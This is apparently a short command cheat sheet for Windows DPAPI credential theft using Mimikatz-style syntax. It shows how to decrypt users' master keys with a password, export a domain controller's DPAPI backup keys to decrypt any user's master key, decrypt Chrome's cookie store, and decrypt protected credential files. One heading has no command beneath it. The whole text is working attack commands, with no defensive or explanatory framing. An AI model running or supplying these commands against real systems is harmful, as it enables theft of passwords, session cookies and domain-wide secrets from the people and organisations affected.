# Extract and decrypt a master key
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /sid:$SID /password:$PASSWORD /protected
# Extract and decrypt all master keys
# Extract the backup keys & use it to decrypt a master key
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"
# Decrypt DPAPI-protected data using a master key
dpapi::cred /in:"C:\path\to\encrypted\file" /masterkey:$MASTERKEY